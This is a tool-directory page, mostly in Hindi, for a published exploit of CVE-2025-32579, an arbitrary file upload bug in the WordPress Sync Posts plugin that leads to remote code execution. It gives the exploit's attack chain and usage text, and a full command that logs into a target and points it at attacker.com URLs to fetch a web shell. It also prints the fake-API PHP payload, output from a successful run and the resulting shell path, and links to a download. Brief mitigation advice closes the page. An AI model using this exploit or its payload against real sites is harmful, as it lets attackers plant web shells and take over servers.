Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32579 — WordPress Sync Posts Plugin <= 1.0 में Arbitrary File Upload की कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-32579
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2025-32579

CVE-2025-32579

WordPress Sync Posts Plugin <= 1.0 में Arbitrary File Upload की कमजोरी है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ CVE-2025-32579 - Sync Posts प्लगइन (WordPress) के माध्यम से गंभीर RCE

📦 प्रभावित: Sync Posts <= 1.0
🧨 CVSS स्कोर: 9.9 गंभीर
📁 CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H


🧠 भेद्यता अवलोकन

SoftClever Limited द्वारा Sync Posts WordPress प्लगइन अप्रतिबंधित फ़ाइल अपलोड भेद्यता से ग्रस्त है जो प्रमाणित हमलावरों को सर्वर पर मनमानी PHP फ़ाइलें (जैसे वेब शेल) अपलोड और निष्पादित करने की अनुमति देता है।

🔓 मूल कारण:

  • प्लगइन एक website_url स्वीकार करता है जो JSON पोस्ट लौटाता है।
  • यह बिना मान्यता के पोस्ट सामग्री से आँख बंद करके छवियाँ लाता है।
  • कोई फ़ाइल प्रकार, mime-प्रकार, या पथ प्रतिबंध लागू नहीं होता।
  • सभी छवियाँ (PHP फ़ाइलों सहित) डाउनलोड की जाती हैं और wp-content/uploads के अंदर संग्रहीत की जाती हैं।

🚨 यह खतरनाक क्यों है

  • ✅ दूरस्थ कोड निष्पादन (RCE)
  • ✅ वेब शेल सीधे सर्वर पर अपलोड करता है
  • ✅ न्यूनतम अनुमतियाँ आवश्यक हैं (केवल प्रमाणित उपयोगकर्ता)

⚙️ स्क्रिप्ट विवरण (एक्सप्लॉइट)

एक्सप्लॉइट स्क्रिप्ट पूरी श्रृंखला को स्वचालित करती है:

  1. 📥 प्रदान किए गए क्रेडेंशियल का उपयोग करके WordPress में लॉगिन करता है
  2. 🧠 शेल को <img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/..."> के रूप में रखते हुए JSON पोस्ट लौटाने वाली नकली API PHP उत्पन्न करता है
  3. 📡 admin-ajax.php?action=sync_posts पर दुर्भावनापूर्ण website_url भेजता है
  4. 💣 प्लगइन को शेल को /uploads/ में लाने और सहेजने के लिए मजबूर करता है
  5. ✅ Referer या nonce की आवश्यकता नहीं — सत्र कुकी पर्याप्त है

root@kitploit:~
usage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL

Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://target.com/wordpress)
  -un, --username USERNAME
                        Username to login
  -p, --password PASSWORD
                        Password to login
  -ws, --website WEBSITE
                        URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
  -shell, --webshell WEBSHELL
                        Web shell URL used inside the fake API (can be a test image)
                                                                                       

💻 उपयोग निर्देश

📌 कमांड प्रारूप:

root@kitploit:~
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php

⚙️ तर्क:

फ्लैगविवरण
-u, --urlलक्ष्य WordPress URL
-un, --usernameWordPress उपयोगकर्ता नाम (admin)
-p, --passwordWordPress पासवर्ड
-ws, --websiteनकली पोस्ट JSON लौटाने वाली दुर्भावनापूर्ण PHP फ़ाइल का URL
-shell, --webshell`` के माध्यम से इंजेक्ट करने के लिए वास्तविक शेल फ़ाइल

आप परीक्षण के लिए वास्तविक शेल के बजाय एक डमी छवि का भी उपयोग कर सकते हैं:

root@kitploit:~
--webshell https://via.placeholder.com/1x1.jpg

🧪 नकली API आउटपुट का उदाहरण

यह Khaled_alenazi.php द्वारा लौटाया गया प्रतिक्रिया है:

root@kitploit:~
<?php
header('Content-Type: application/json');
echo json_encode([
  [
    "id" => 1,
    "title" => ["rendered" => "Nxploited"],
    "content" => [
      "rendered" => "<img src="http://attacker.com/shell.php">"
    ]
  ]
]);
?>

✅ सफल एक्सप्लॉइट:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
  "success": true,
  "data": {
    "message": "Posts imported successfully",
    ...
  }
}

🔥 सफल शोषण के बाद:

  • शेल पथ और नाम: shell.php
  • target.com/wp-content/uploads/2025/04/shell.php

🛠️ सुधार / शमन

  • website_url तक पहुँच को आंतरिक डोमेन या श्वेतसूचीबद्ध होस्ट तक सीमित करें
  • छवि एक्सटेंशन और सामग्री प्रकारों को मान्य करें
  • स्वच्छता के बिना तृतीय-पक्ष JSON को पार्स करने से बचें

🧷 संदर्भ

CVE: CVE-2025-32579
एक्सप्लॉइट द्वारा: Nxploited (Khaled Alenazi)


टूल डाउनलोड करें